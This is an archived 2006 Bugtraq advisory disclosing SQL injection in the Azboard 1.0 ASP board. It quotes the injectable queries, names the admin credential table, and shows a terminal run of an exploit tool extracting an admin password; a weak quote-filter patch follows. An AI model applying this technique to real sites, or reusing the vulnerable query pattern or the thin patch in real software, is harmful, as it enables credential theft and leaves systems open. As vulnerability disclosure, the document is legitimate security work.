Azboard <= 1.0 Multiple Sql Injections

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Azboard <= 1.0 Multiple Sql Injections
From: geinblues@xxxxxxxxx
Date: 15 May 2006 02:43:15 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Title : Azboard <= 1.0 Multiple Sql Injections

Published : 2006.5.14
Author : x90c(&#51221;&#44221;&#51452;)@chollian.net/~jyj9782/
Link : http://user.chol.com/~jyj9782/sec/azboard_advisory.txt

0x01 Summary

 Azboard is a web board written in asp (active server pages).
It has a sql injection hole. so we can get the admin(bbs)'s 
Id and password and so on. let's start to see what is the code..



0x02 Codes


~/azboard/list.asp:
-
49:    if searchstring<>"" then
50:     sql="select count(board_idx) from board where " & search & " like '%" & 
searchstring & "%' and cate='"&cate&"' "
51:    else
52:     sql="select count(board_idx) from board where cate='"&cate&"'"
53:    end if
-

   above lines are vulnerable to sql attak as you can see. y0! ;)~


~/azboard/admin_ok.asp:
-
27: SQL = "SELECT cate,admin_id,admin_pass,board_name FROM board_admin where 
admin_id='"&id&"' and cate='"&cate&"'"
-

   i found the fields('admin_id', 'admin_pass') and table('board_admin') in 
this file.




0x03 Exploit

[root@ebp exploits]# ls -al azboard_blue.c
-rw-r--r--    1 root     root         4771  5&#50900; 14 23:30 azboard_blue.c
[root@ebp exploits]# ls -al azboard_blue
-rwxr-xr-x    1 root     root        17163  5&#50900; 14 23:30 azboard_blue
[root@ebp exploits]#
[root@ebp exploits]# make azboard_blue
cc     azboard_blue.c   -o azboard_blue
azboard_blue.c: In function `tu1':
azboard_blue.c:55: warning: assignment makes pointer from integer without a cast
azboard_blue.c:59: warning: assignment makes pointer from integer without a cast
azboard_blue.c:63: warning: assignment makes pointer from integer without a cast
azboard_blue.c:67: warning: assignment makes pointer from integer without a cast
[root@ebp exploits]# ./azboard_blue


 azaboard 1.0 <= 0day :

 $ ./azboard_blue <azboard URL> <cate>



      ~ x90c@xxxxxxxxxxxx/~jyj9782

[root@ebp exploits]#
[root@ebp exploits]# ./azboard_blue http://192.168.0.5 testbbs
[ LANG=KOR admin id ] admin
[ LANG=KOR admin pass ] 1234
[root@ebp exploits]#


0x04 Patch

~/azboard/list.asp:
..
if instr(search, "\'") > 0 or instr(cate, "\'") > 0 or instr(cate, "\'") > 0 
then
        Response.redirect "error.asp"
end if
..




Thanks for many 0p3n-H4ck3rz!



- Blu3h4t Team.

Prev by Date: RealVNC 4.1.1 Remote Compromise
Next by Date: tyree[at]users.sourceforge.net
Previous by thread: re: RealVNC 4.1.1 Remote Compromise
Next by thread: tyree[at]users.sourceforge.net
Index(es):
- Date
- Thread